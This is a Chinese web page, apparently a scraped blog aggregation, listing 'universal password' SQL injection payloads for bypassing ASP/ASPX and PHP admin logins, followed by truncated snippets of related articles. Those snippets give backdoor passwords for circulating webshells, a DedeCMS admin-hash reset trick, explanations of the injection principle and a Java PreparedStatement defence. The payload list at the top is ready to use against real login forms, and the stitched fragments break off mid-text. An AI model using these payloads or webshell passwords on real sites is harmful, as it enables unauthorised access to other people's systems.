后台登陆万能密码总结

1.Asp/Aspx万能密码:

  1. ‘or‘=‘or‘
  2. ‘or 1=1--
  3. ‘‘or 1=1--
  4. ‘or‘a‘=‘a
  5. "or "a"="a
  6. "or"="a‘=‘a
  7. ‘)or(‘a‘=‘a
  8. or 1=1--
  9. a‘or‘ 1=1--
  10. "or"="a‘=‘a
  11. ‘or‘‘=‘
  12. 1 or ‘1‘=‘1‘=1
  13. 1 or ‘1‘=‘1‘ or 1=1
  14. ‘OR 1=1%00
  15. "or 1=1%00
  16. ‘xor
  17. admin‘ or ‘a‘=‘a 密码随便

2.PHP万能密码:

  1. ‘or‘=‘or‘
  2. ‘or 1=1/*  字符型 GPC是否开都可以使用

时间: 2024-10-31 10:33:51

后台登陆万能密码总结的相关文章

网络安全系列之十 万能密码登录网站后台

在登录网站后台时,有一个比较古老的"万能密码"漏洞,即利用一个我们精心构造的用户名,即使不用输入密码,也可以登录后台,其原理仍属于SQL注入的范畴. 假设数据库中存放用户信息的表是admin,其中存放用户名的字段是username,存放密码的字段是password,在用户验证页面中用来接收用户所输入的用户名和密码的变量也分别是username和password,当用户在用户验证页面输入用户名和密码后,会提交给如下的语句进行处理: select * from admin where `u

PHP万能密码登陆

原文地址:http://www.cnblogs.com/freespider/archive/2010/09/26/1835346.html 说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是 百分之百. 可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了 PHP注入. 其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台. 其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有. 如果你用这样的万能密码‘or'='or

织梦dedecms后台登陆密码充值工具

下载后解压,根据自己语言版本,把文件radminpass.php放入网站根目录下执行即可 点击下载:织梦dedecms后台登陆密码充值工具 原文地址:https://www.cnblogs.com/bubuchu/p/10981977.html

织梦重置密码的方法和织梦网站后台登陆账号修改方法

1.打开数据库,找到数据库表名为:dede_admin,单击dede_admin,将 d95a993df018d377fef8,替换为:f297a57a5a743894a0e4   ,这个值表示:admin就是织梦的默认密码.替换后保存. 2.将radminpass.php上传网站根目录,访问域名/radminpass.php 3.登录网站后台修改 4.织梦网站后台登陆账号修改方法     update dede_admin set userid='admin' where id=1     执

万能密码-知识合集

所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能.分享给大家.. 希望对大家有所帮助!asp aspx万能密码1:"or "a"="a2:'.).or.('.a.'='.a 3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or' adm

从c#角度看万能密码SQL注入漏洞

以前学习渗透时,虽然也玩过万能密码SQL注入漏洞登陆网站后台,但仅仅会用,并不理解其原理. 今天学习c#数据库这一块,正好学到了这方面的知识,才明白原来是怎么回事. 众所周知的万能密码SQL注入漏洞,大家相信很熟悉了. 不懂得简单了解下,懂的大牛直接飘过即可. ***************************************************************************** 当我们用御剑之类的扫描器扫描到某些有这个万能密码SQL注入的漏洞网站后台后, 打开

注入技术--万能密码注入

[实验目的] 1)理解[万能密码]的原理 2)学习[万能密码]的使用 [实验原理] 用户进行用户名和密码验证时,网站需要查询数据库.查询数据库就是执行SQL语句.针对此BBS论坛,当用户登录时,后台执行的数据库查询操作(SQL语句)是[Select user_id,user_type,email From usersWhere user_id='用户名' And password='密码'].由于网站后台在进行数据库查询的时候没有对单引号进行过滤,当输入用户名[admin]和万能密码[2'or'

最强黑吃黑:WEBSHELL大马隐藏万能密码大全

因为很多原因,很多新手都不会编写自己的大马,大多数新手都会通过百度去下载对应脚本的大马,然而这些webshell大马都是早期流传出来的,基本上都存在后门,可以通过万能密码登录,即使你修改i过密码了,怎么样是不是很可怕?下面小编就将这些万能密码分享给大家吧! 黑羽基地免杀asp大马 密码5201314 Hacked By CHINA! 密码china Asp站长助手6.0 密码584521 web综合安全评测 – Beta3 密码nohack 未知数X 密码45189946 baidu}" 密码b

防止sql注入方法 如何防止java中将MySQL的数据库验证密码加上 ' or '1'= '1 就可以出现万能密码 的PreparedStatement

package com.swift; import java.sql.Connection; import java.sql.DriverManager; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; public class LoginJDBC$PreparedStatement { public static void main(String[] args